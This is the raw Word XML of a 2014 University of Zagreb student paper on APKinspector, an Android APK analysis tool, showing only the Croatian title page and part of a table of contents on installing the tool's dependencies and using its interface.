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EAA" w:rsidRPr="009138C1" w:rsidRDefault="009138C1" w:rsidP="00750888">
      <w:pPr>
        <w:pStyle w:val="Naslovdokumenta"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009138C1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SVEUČILIŠTE U ZAGREBU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750888" w:rsidRPr="009138C1" w:rsidRDefault="00501EAA" w:rsidP="00750888">
      <w:pPr>
        <w:pStyle w:val="Naslovdokumenta"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009138C1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA</w:t>
      </w:r>
    </w:p>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DE5302" w:rsidRDefault="00DE5302" w:rsidP="00750888"/>
    <w:p w:rsidR="00DE5302" w:rsidRDefault="00DE5302" w:rsidP="00750888"/>
    <w:p w:rsidR="00501EAA" w:rsidRPr="00501EAA" w:rsidRDefault="00DE5302" w:rsidP="00750888">
      <w:pPr>
        <w:pStyle w:val="Naslovdokumenta"/>
      </w:pPr>
      <w:r>
        <w:t>APKinspector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501EAA" w:rsidRDefault="00DE5302" w:rsidP="009138C1">
      <w:pPr>
        <w:pStyle w:val="Autordokumenta"/>
      </w:pPr>
      <w:r>
        <w:t>Valerio Franković</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F2E0C" w:rsidRPr="009138C1" w:rsidRDefault="001F2E0C" w:rsidP="00DE5302">
      <w:pPr>
        <w:pStyle w:val="Autordokumenta"/>
      </w:pPr>
      <w:r w:rsidRPr="00272CCD">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Voditelj:</w:t>
      </w:r>
      <w:r w:rsidRPr="009138C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE5302">
        <w:t>izv. prof. dr. sc. Marin Golub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750888" w:rsidRDefault="00750888" w:rsidP="00750888"/>
    <w:p w:rsidR="00750888" w:rsidRDefault="00750888" w:rsidP="00750888"/>
    <w:p w:rsidR="001F2E0C" w:rsidRDefault="001F2E0C" w:rsidP="00750888"/>
    <w:p w:rsidR="001F2E0C" w:rsidRDefault="001F2E0C" w:rsidP="00750888"/>
    <w:p w:rsidR="00750888" w:rsidRDefault="00750888" w:rsidP="00750888"/>
    <w:p w:rsidR="001F2E0C" w:rsidRDefault="001F2E0C"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DE5302">
      <w:pPr>
        <w:pStyle w:val="Mjestoidatum"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zagreb, </w:t>
      </w:r>
      <w:r w:rsidR="00DE5302">
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="006728B9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009138C1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DE5302">
        <w:t>2014</w:t>
      </w:r>
      <w:r w:rsidR="006728B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRDefault="00750888" w:rsidP="008B4C8C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="TOCNaslov"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sadržaj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc406756587" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Uvod</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756587 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756588" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Izgradnja i instalacija programa APKinspector</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756588 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756589" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>2.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Izgradnja i instalacija zavisnosti programa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756589 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756590" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija Pythona</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756590 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756591" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija QT SDK</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756591 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756592" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija SIP-a</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756592 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756593" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija PyQTx</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756593 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756594" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija alata pip</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756594 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756595" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija alata Graphviz</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756595 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756596" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.7.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija alata pydot</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756596 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756597" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>2.1.8.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Instalacija alata apktool</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756597 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756598" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>2.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Pokretanje alata</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756598 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756599" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Grafičko sučelje</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756599 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756600" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>3.1.</w:t>
        </w:r>
